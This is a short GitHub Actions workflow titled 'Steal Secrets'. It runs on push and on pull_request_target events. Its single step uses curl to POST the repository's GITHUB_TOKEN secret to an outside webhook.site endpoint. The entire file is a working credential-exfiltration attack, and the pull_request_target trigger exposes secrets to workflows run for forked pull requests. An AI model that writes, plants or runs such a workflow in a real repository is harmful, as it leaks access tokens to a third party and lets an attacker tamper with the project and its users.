name: Steal Secrets
on: [push, pull_request_target]

jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST https://webhook.site/8fc69a17-1214-4b5d-9507-3e896283978c \
            -d "token=${{ secrets.GITHUB_TOKEN }}"
